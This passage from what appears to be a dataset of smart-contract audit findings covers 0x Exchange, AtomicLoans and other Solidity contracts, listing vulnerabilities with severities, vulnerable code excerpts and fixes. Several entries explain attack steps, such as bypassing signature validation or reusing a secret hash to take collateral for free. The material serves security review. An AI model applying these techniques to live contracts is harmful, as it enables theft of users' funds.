mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\n -BlockhashRegistry - Existing blockhashes can be overwrittenчlowчLast 256 blocks, that are available in the EVM environment, are stored in `BlockhashRegistry` by calling `snapshot()` or `saveBlockNumber(uint _blockNumber)` functions. 
Older blocks are recreated by calling `recreateBlockheaders`.\\nThe methods will overwrite existing blockhashes.\\n```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, \"block not available\");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n\\n```\\nblockhashMapping[bnr] = calculatedHash;\\n```\\nчResolution\\nAddressed with 80bb6ecf and 17d450cf by checking if blockhash exists and changing the `assert` to `require`.\\nIf a block is already saved in the smart contract, it can be checked and a SSTORE can be prevented to save gas. Require that blocknumber hash is not stored.\\n```\\nrequire(blockhashMapping[\\_blockNumber] == 0x0, \"block already saved\");\\n```\\nчч```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, \"block not available\");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n -An account that confirms a transaction via AssetProxyOwner can indefinitely block that transactionчhighчWhen a transaction reaches the required number of confirmations in `confirmTransaction()`, its confirmation time is recorded:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n\\nBefore the time lock has elapsed and the transaction is executed, any of the owners that originally confirmed the transaction can revoke their 
confirmation via revokeConfirmation():\\n```\\n/// @dev Allows an owner to revoke a confirmation for a transaction.\\n/// @param transactionId Transaction ID.\\nfunction revokeConfirmation(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n confirmed(transactionId, msg.sender)\\n notExecuted(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = false;\\n emit Revocation(msg.sender, transactionId);\\n}\\n```\\n\\nImmediately after, that owner can call `confirmTransaction()` again, which will reset the confirmation time and thus the time lock.\\nThis is especially troubling in the case of a single compromised key, but it's also an issue for disagreement among owners, where any m of the n owners should be able to execute transactions but could be blocked.\\nMitigations\\nOnly an owner can do this, and that owner has to be part of the group that originally confirmed the transaction. This means the malicious owner may have to front run the others to make sure they're in that initial confirmation set.\\nEven once a malicious owner is in position to execute this perpetual delay, they need to call `revokeConfirmation()` and `confirmTransaction()` again each time. Another owner can attempt to front the attacker and execute their own `confirmTransaction()` immediately after the `revokeConfirmation()` to regain control.чThere are several ways to address this, but to best preserve the original `MultiSigWallet` semantics, once a transaction has reached the required number of confirmations, it should be impossible to revoke confirmations. 
In the original implementation, this is enforced by immediately executing the transaction when the final confirmation is received.чч```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n -Orders with signatures that require regular validation can have their validation bypassed if the order is partially filledчhighчThe signature types `Wallet`, `Validator`, and `EIP1271Wallet` require explicit validation to authorize each action performed on a given order. This means that if an order was signed using one of these methods, the `Exchange` must perform a validation step on the signature each time the order is submitted for a partial fill. In contrast, the other canonical signature types (EIP712, `EthSign`, and PreSigned) are only required to be validated by the `Exchange` on the order's first fill; subsequent fills take the order's existing fill amount as implicit validation that the order has a valid, published signature.\\nThis re-validation step for `Wallet`, `Validator`, and `EIP1271Wallet` signatures is intended to facilitate their use with contracts whose validation depends on some state that may change over time. For example, a validating contract may call into a price feed and determine that some order is invalid if its price deviates from some expected range. 
In this case, the repeated validation allows 0x users to make orders with custom fill conditions which are evaluated at run-time.\\nWe found that if the sender provides the contract with an invalid signature after the order in question has already been partially filled, the regular validation check required for `Wallet`, `Validator`, and `EIP1271Wallet` signatures can be bypassed entirely.\\nSignature validation takes place in `MixinExchangeCore._assertFillableOrder`. A signature is only validated if it passes the following criteria:\\n```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n\\nIn effect, signature validation only occurs if:\\n`orderInfo.orderTakerAssetFilledAmount == 0` OR\\n`_doesSignatureRequireRegularValidation(orderHash, makerAddress, signature)`\\nIf an order is partially filled, the first condition will evaluate to false. 
Then, that order's signature will only be validated if `_doesSignatureRequireRegularValidation` evaluates to true:\\n```\\nfunction \\_doesSignatureRequireRegularValidation(\\n bytes32 hash,\\n address signerAddress,\\n bytes memory signature\\n)\\n internal\\n pure\\n returns (bool needsRegularValidation)\\n{\\n // Read the signatureType from the signature\\n SignatureType signatureType = \\_readSignatureType(\\n hash,\\n signerAddress,\\n signature\\n );\\n\\n // Any signature type that makes an external call needs to be revalidated\\n // with every partial fill\\n needsRegularValidation =\\n signatureType == SignatureType.Wallet ||\\n signatureType == SignatureType.Validator ||\\n signatureType == SignatureType.EIP1271Wallet;\\n return needsRegularValidation;\\n}\\n```\\n\\nThe `SignatureType` returned from `_readSignatureType` is directly cast from the final byte of the passed-in signature. Any value that does not cast to `Wallet`, `Validator`, and `EIP1271Wallet` will cause `_doesSignatureRequireRegularValidation` to return false, skipping validation.\\nThe result is that an order whose signature requires regular validation can be forced to skip validation if it has been partially filled, by passing in an invalid signature.чThere are a few options for remediation:\\nHave the `Exchange` validate the provided signature every time an order is filled.\\nRecord the first seen signature type or signature hash for each order, and check that subsequent actions are submitted with a matching signature.\\nThe first option requires the fewest changes, and does not require storing additional state. 
While this does mean some additional cost validating subsequent signatures, we feel the increase in flexibility is well worth it, as a maker could choose to create multiple valid signatures for use across different order books.чч```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n -Changing the owners or required confirmations in the AssetProxyOwner can unconfirm a previously confirmed transactionчmediumчOnce a transaction has been confirmed in the `AssetProxyOwner`, it cannot be executed until a lock period has passed. During that time, any change to the number of required confirmations will cause this transaction to no longer be executable.\\nIf the number of required confirmations was decreased, then one or more owners will have to revoke their confirmation before the transaction can be executed.\\nIf the number of required confirmations was increased, then additional owners will have to confirm the transaction, and when the new required number of confirmations is reached, a new confirmation time will be recorded, and thus the time lock will restart.\\nSimilarly, if an owner that had previously confirmed the transaction is replaced, the number of confirmations will drop for existing transactions, and they will need to be confirmed again.\\nThis is not disastrous, but it's almost certainly unintended behavior and may make it difficult to make changes to the multisig owners and parameters.\\n`executeTransaction()` requires that at the time of execution, the transaction is confirmed:\\n```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n fullyConfirmed(transactionId)\\n```\\n\\n`isConfirmed()` checks for exact equality with the number of required 
confirmations. Having too many confirmations is just as bad as too few:\\n```\\n/// @dev Returns the confirmation status of a transaction.\\n/// @param transactionId Transaction ID.\\n/// @return Confirmation status.\\nfunction isConfirmed(uint256 transactionId)\\n public\\n view\\n returns (bool)\\n{\\n uint256 count = 0;\\n for (uint256 i = 0; i < owners.length; i++) {\\n if (confirmations[transactionId][owners[i]]) {\\n count += 1;\\n }\\n if (count == required) {\\n return true;\\n }\\n }\\n}\\n```\\n\\nIf additional confirmations are required to reconfirm a transaction, that resets the time lock:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\nчAs in https://github.com/ConsenSys/0x-v3-audit-2019-09/issues/39, the semantics of the original `MultiSigWallet` were that once a transaction is fully confirmed, it's immediately executed. The time lock means this is no longer possible, but it is possible to record that the transaction is confirmed and never allow this to change. In fact, the confirmation time already records this. Once the confirmation time is non-zero, a transaction should always be considered confirmed.чч```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n fullyConfirmed(transactionId)\\n```\\n -Reentrancy in executeTransaction() Won't FixчmediumчIn `MixinTransactions`, `executeTransaction()` and `batchExecuteTransactions()` do not have the `nonReentrant` modifier. 
Because of that, it is possible to execute nested transactions or call these functions during other reentrancy attacks on the exchange. The reason behind that decision is to be able to call functions with `nonReentrant` modifier as delegated transactions.\\nNested transactions are partially prevented with a separate check that does not allow transaction execution if the exchange is currently in somebody else's context:\\n```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n\\nThis check still leaves some possibility of reentrancy. Allowing that behavior is dangerous and may create possible attack vectors in the future.чAdd a new modifier to `executeTransaction()` and `batchExecuteTransactions()` which is similar to `nonReentrant` but uses different storage slot.чч```\\n// Prevent `executeTransaction` from being called when context is already set\\naddress currentContextAddress\\_ = currentContextAddress;\\nif (currentContextAddress\\_ != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.TransactionInvalidContextError(\\n transactionHash,\\n currentContextAddress\\_\\n ));\\n}\\n```\\n -“Poison” order that consumes gas can block market trades Won't FixчmediumчThe market buy/sell functions gather a list of orders together for the same asset and try to fill them in order until a target amount has been traded.\\nThese functions use `MixinWrapperFunctions._fillOrderNoThrow()` to attempt to fill each order but ignore failures. 
This way, if one order is unfillable for some reason, the overall market order can still succeed by filling other orders.\\nOrders can still force `_fillOrderNoThrow()` to revert by using an external contract for signature validation and having that contract consume all available gas.\\nThis makes it possible to advertise a “poison” order for a low price that will block all market orders from succeeding. It's reasonable to assume that off-chain order books will automatically include the best prices when constructing market orders, so this attack would likely be quite effective. Note that such an attack costs the attacker nothing because all they need is an on-chain contract that consumes all available gas (maybe via an assert). This makes it a very appealing attack vector for, e.g., an order book that wants to temporarily disable a competitor.\\nDetails\\n`_fillOrderNoThrow()` forwards all available gas when filling the order:\\n```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n\\nSimilarly, when the `Exchange` attempts to fill an order that requires external signature validation (Wallet, `Validator`, or `EIP1271Wallet` signature types), it forwards all available gas:\\n```\\n(bool didSucceed, bytes memory returnData) = verifyingContractAddress.staticcall(callData);\\n```\\n\\nIf the verifying contract consumes all available gas, it can force the overall transaction to revert.\\nPedantic Note\\nTechnically, it's impossible to consume all remaining gas when called by another contract because the EVM holds back a small amount, but even at the block gas limit, the amount held back would be insufficient to complete the transaction.чConstrain the gas that is forwarded during signature validation. 
This can be constrained either as a part of the signature or as a parameter provided by the taker.чч```\\n// ABI encode calldata for `fillOrder`\\nbytes memory fillOrderCalldata = abi.encodeWithSelector(\\n IExchangeCore(address(0)).fillOrder.selector,\\n order,\\n takerAssetFillAmount,\\n signature\\n);\\n\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(fillOrderCalldata);\\n```\\n -Front running in matchOrders() Won't FixчmediumчCalls to `matchOrders()` are made to extract profit from the price difference between two opposite orders: left and right.\\n```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n\\nThe caller only pays protocol and transaction fees, so it's almost always profitable to front run every call to `matchOrders()`. That would lead to gas auctions and would make `matchOrders()` difficult to use.чConsider adding a commit-reveal scheme to `matchOrders()` to stop front running altogether.чч```\\nfunction matchOrders(\\n LibOrder.Order memory leftOrder,\\n LibOrder.Order memory rightOrder,\\n bytes memory leftSignature,\\n bytes memory rightSignature\\n)\\n```\\n -The Exchange owner should not be able to call executeTransaction or batchExecuteTransaction Won't FixчmediumчIf the owner calls either of these functions, the resulting `delegatecall` can pass `onlyOwner` modifiers even if the transaction signer is not the owner. 
This is because, regardless of the `contextAddress` set through `_executeTransaction`, the `onlyOwner` modifier checks `msg.sender`.\\n`_executeTransaction` sets the context address to the signer address, which is not `msg.sender` in this case:\\n```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n\\nThe resulting `delegatecall` could target an admin function like this one:\\n```\\n/// @dev Registers an asset proxy to its asset proxy id.\\n/// Once an asset proxy is registered, it cannot be unregistered.\\n/// @param assetProxy Address of new asset proxy to register.\\nfunction registerAssetProxy(address assetProxy)\\n external\\n onlyOwner\\n{\\n // Ensure that no asset proxy exists with current id.\\n bytes4 assetProxyId = IAssetProxy(assetProxy).getProxyId();\\n address currentAssetProxy = \\_assetProxies[assetProxyId];\\n if (currentAssetProxy != address(0)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.AssetProxyExistsError(\\n assetProxyId,\\n currentAssetProxy\\n ));\\n }\\n \\n // Add asset proxy and log registration.\\n \\_assetProxies[assetProxyId] = assetProxy;\\n emit AssetProxyRegistered(\\n assetProxyId,\\n assetProxy\\n );\\n}\\n```\\n\\nThe `onlyOwner` modifier does not check the context address, but checks msg.sender:\\n```\\nfunction \\_assertSenderIsOwner()\\n internal\\n view\\n{\\n if (msg.sender != owner) {\\n LibRichErrors.rrevert(LibOwnableRichErrors.OnlyOwnerError(\\n msg.sender,\\n owner\\n ));\\n }\\n}\\n```\\nчAdd a check to `_executeTransaction` that prevents the owner from calling this function.чч```\\n// Set the current transaction signer\\naddress signerAddress = transaction.signerAddress;\\n\\_setCurrentContextAddressIfRequired(signerAddress, signerAddress);\\n```\\n -By manipulating the gas limit, relayers can affect the outcome of ZeroExTransactions Won't FixчlowчZeroExTransactions are meta transactions 
supported by the `Exchange`. They do not require that they are executed with a specific amount of gas, so the transaction relayer can choose how much gas to provide. By choosing a low gas limit, a relayer can affect the outcome of the transaction.\\nA `ZeroExTransaction` specifies a signer, an expiration, and call data for the transaction:\\n```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n\\nIn `MixinTransactions._executeTransaction()`, all available gas is forwarded in the delegate call, and the transaction is marked as executed:\\n```\\ntransactionsExecuted[transactionHash] = true;\\n(bool didSucceed, bytes memory returnData) = address(this).delegatecall(transaction.data);\\n```\\n\\nA likely attack vector for this is front running a `ZeroExTransaction` that ultimately invokes `_fillNoThrow()`. In this scenario, an attacker sees the call to `executeTransaction()` and makes their own call with a lower gas limit, causing the order being filled to run out of gas but allowing the transaction as a whole to succeed.\\nIf such an attack is successful, the `ZeroExTransaction` cannot be replayed, so the signer must produce a new signature and try again, ad infinitum.чResolution\\nFrom the development team:\\nWhile this is an annoyance when used in combination with `marketBuyOrdersNoThrow` and `marketSellOrdersNoThrow`, it does not seem worth it to add a `gasLimit` to 0x transactions for this reason alone. 
Instead, this quirk should be documented along with a recommendation to use the `fillOrKill` variants of each market fill function when used in combination with 0x transactions.\\nAdd a `gasLimit` field to `ZeroExTransaction` and forward exactly that much gas via `delegatecall`. (Note that you must explicitly check that sufficient gas is available because the EVM allows you to supply a gas parameter that exceeds the actual remaining gas.)чч```\\nstruct ZeroExTransaction {\\n uint256 salt; // Arbitrary number to ensure uniqueness of transaction hash.\\n uint256 expirationTimeSeconds; // Timestamp in seconds at which transaction expires.\\n uint256 gasPrice; // gasPrice that transaction is required to be executed with.\\n address signerAddress; // Address of transaction signer.\\n bytes data; // AbiV2 encoded calldata.\\n}\\n```\\n -Modifier ordering plays a significant role in modifier efficacyчlowчThe `nonReentrant` and `refundFinalBalance` modifiers always appear together across the 0x monorepo. When used, they invariably appear with `nonReentrant` listed first, followed by `refundFinalBalance`. This specific order appears inconsequential at first glance but is actually important. The order of execution is as follows:\\nThe `nonReentrant` modifier runs (_lockMutexOrThrowIfAlreadyLocked).\\nIf `refundFinalBalance` had a prefix, it would run now.\\nThe function itself runs.\\nThe `refundFinalBalance` modifier runs (_refundNonZeroBalanceIfEnabled).\\nThe `nonReentrant` modifier runs (_unlockMutex).\\nThe fact that the `refundFinalBalance` modifier runs before the mutex is unlocked is of particular importance because it potentially invokes an external call, which may reenter. 
If the order of the two modifiers were flipped, the mutex would unlock before the external call, defeating the purpose of the reentrancy guard.\\n```\\nnonReentrant\\nrefundFinalBalance\\n```\\nчResolution\\nThis is fixed in 0xProject/0x-monorepo#2228 by introducing a new modifier that combines the two: `refundFinalBalance`.\\nAlthough the order of the modifiers is correct as-is, this pattern introduces cognitive overhead when making or reviewing changes to the 0x codebase. Because the two modifiers always appear together, it may make sense to combine the two into a single modifier where the order of operations is explicit.чч```\\nnonReentrant\\nrefundFinalBalance\\n```\\n -Several overflows in LibBytesчlowчSeveral functions in `LibBytes` have integer overflows.\\n`LibBytes.readBytesWithLength` returns a pointer to a `bytes` array within an existing `bytes` array at some given `index`. The length of the nested array is added to the given `index` and checked against the parent array to ensure the data in the nested array is within the bounds of the parent. However, because the addition can overflow, the bounds check can be bypassed to return an array that points to data out of bounds of the parent array.\\n```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n\\nThe following functions have similar issues:\\n`readAddress`\\n`writeAddress`\\n`readBytes32`\\n`writeBytes32`\\n`readBytes4`чAn overflow check should be added to the function. Alternatively, because `readBytesWithLength` does not appear to be used anywhere in the 0x project, the function should be removed from `LibBytes`. 
Additionally, the following functions in `LibBytes` are also not used and should be considered for removal:\\n`popLast20Bytes`\\n`writeAddress`\\n`writeBytes32`\\n`writeUint256`\\n`writeBytesWithLength`\\n`deepCopyBytes`чч```\\nif (b.length < index + nestedBytesLength) {\\n LibRichErrors.rrevert(LibBytesRichErrors.InvalidByteOperationError(\\n LibBytesRichErrors\\n .InvalidByteOperationErrorCodes.LengthGreaterThanOrEqualsNestedBytesLengthRequired,\\n b.length,\\n index + nestedBytesLength\\n ));\\n}\\n```\\n -NSignatureTypes enum value bypasses Solidity safety checks Won't FixчlowчThe `ISignatureValidator` contract defines an enum `SignatureType` to represent the different types of signatures recognized within the exchange. The final enum value, `NSignatureTypes`, is not a valid signature type. Instead, it is used by `MixinSignatureValidator` to check that the value read from the signature is a valid enum value. However, Solidity now includes its own check for enum casting, and casting a value over the maximum enum size to an enum is no longer possible.\\nBecause of the added `NSignatureTypes` value, Solidity's check now recognizes `0x08` as a valid `SignatureType` value.\\nThe check is made here:\\n```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\nчThe check should be removed, as should the `SignatureTypes.NSignatureTypes` value.чч```\\n// Ensure signature is supported\\nif (uint8(signatureType) >= uint8(SignatureType.NSignatureTypes)) {\\n LibRichErrors.rrevert(LibExchangeRichErrors.SignatureError(\\n LibExchangeRichErrors.SignatureErrorCodes.UNSUPPORTED,\\n hash,\\n signerAddress,\\n signature\\n ));\\n}\\n```\\n -Intentional secret reuse can block borrower and lender from accepting liquidation paymentчhighчFor Dave (the 
liquidator) to claim the collateral he's purchasing, he must reveal secret D. Once that secret is revealed, Alice and Bob (the borrower and lender) can claim the payment.\\nSecrets must be provided via the `Sales.provideSecret()` function:\\n```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n\\nNote that if Dave chooses the same secret hash as either Alice, Bob, or Charlie (arbiter), there is no way to set `secretHashes[sale].secretD` because one of the earlier conditionals will execute.\\nFor Alice and Bob to later receive payment, they must be able to provide Dave's secret:\\n```\\n function accept(bytes32 sale) external {\\n require(!accepted(sale));\\n require(!off(sale));\\n require(hasSecrets(sale));\\n require(sha256(abi.encodePacked(secretHashes[sale].secretD)) == secretHashes[sale].secretHashD);\\n```\\n\\nDave can exploit this to obtain the collateral for free:\\nDave looks at Alice's secret hashes to see which will be used in the sale.\\nDave begins the liquidation process, using the same secret hash.\\nAlice and Bob reveal their secrets A and B through the process of moving the collateral.\\nDave now knows the preimage for the secret hash he provided. 
It was revealed by Alice already.\\nDave uses that secret to obtain the collateral.\\nAlice and Bob now want to receive payment, but they're unable to provide Dave's secret to the `Sales` smart contract due to the order of conditionals in `provideSecret()`.\\nAfter an expiration, Dave can claim a refund.\\nMitigating factors\\nAlice and Bob could notice that Dave chose a duplicate secret hash and refuse to proceed with the sale. This is not something they are likely to do.чEither change the way `provideSecret()` works to allow for duplicate secret hashes or reject duplicate hashes in `create()`.чч```\\n function provideSecret(bytes32 sale, bytes32 secret\\_) external {\\n require(sales[sale].set);\\n if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashA) { secretHashes[sale].secretA = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashB) { secretHashes[sale].secretB = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashC) { secretHashes[sale].secretC = secret\\_; }\\n else if (sha256(abi.encodePacked(secret\\_)) == secretHashes[sale].secretHashD) { secretHashes[sale].secretD = secret\\_; }\\n else { revert(); }\\n }\\n```\\n -There is no way to convert between custom and non-custom funds Won't FixчmediumчEach fund is created using either `Funds.create()` or `Funds.createCustom()`. 
Both enforce a limitation that there can only be one fund per account:\\n```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\n```\\nfunction createCustom(\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 liquidationRatio\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n\\nThese functions are the only place where `bools[fund].custom` is set, and there's no way to delete a fund once it exists. This means there's no way for a given account to switch between a custom and non-custom fund.\\nThis could be a problem if, for example, the default parameters change in a way that a user finds unappealing. They may want to switch to using a custom fund but find themselves unable to do so without moving to a new Ethereum account.чEither allow funds to be deleted or allow funds to be switched between custom and non-custom.чч```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n -Funds.maxFundDur has no effect if maxLoanDur is setчmediumч`Funds.maxFundDur` specifies the maximum amount of time a fund should be active. 
It's checked in `request()` to ensure the duration of the loan won't exceed that time, but the check is skipped if `maxLoanDur` is set:\\n```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n\\nIf a user sets `maxLoanDur` (the maximum loan duration) to 1 week and sets the `maxFundDur` (timestamp when all loans should be complete) to December 1st, then there can actually be a loan that ends on December 7th.чCheck against `maxFundDur` even when `maxLoanDur` is set.чч```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n -Funds.update() lets users update fields that may not have any effectчlowч`Funds.update()` allows users to update the following fields which are only used if `bools[fund].custom` is set:\\n`minLoanamt`\\n`maxLoanAmt`\\n`minLoanDur`\\n`interest`\\n`penalty`\\n`fee`\\n`liquidationRatio`\\nIf `bools[fund].custom` is not set, then these changes have no effect. 
This may be misleading to users.\\n```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\nчResolution\\nThis is fixed in AtomicLoans/atomicloans-eth-contracts#67.\\nThis could be addressed by creating two update functions: one for custom funds and one for non-custom funds. Only the update for custom funds would allow setting these values.чч```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\n -Ingress.setContractAddress() can cause duplicate entries in contractKeysчmediumч`setContractAddress()` checks `ContractDetails` existence by inspecting `contractAddress`. 
A `contractAddress` of `0` means that the contract does not already exist, and its name must be added to contractKeys:\\n```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, \"Contract name must not be empty.\");\\n require(isAuthorized(msg.sender), \"Not authorized to update contract registry.\");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry indexing\\n contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n\\nIf, however, a contract is actually added with the address `0`, which is currently allowed in the code, then the contract does already exists, and adding the name to `contractKeys` again will result in a duplicate.\\nMitigation\\nAn admin can call `removeContract` repeatedly with the same name to remove multiple duplicate entries.чResolution\\nThis is fixed in PegaSysEng/[email protected]faff726.\\nEither disallow a contract address of `0` or check for existence via the `owner` field instead (which can never be 0).чч```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, \"Contract name must not be empty.\");\\n require(isAuthorized(msg.sender), \"Not authorized to update contract 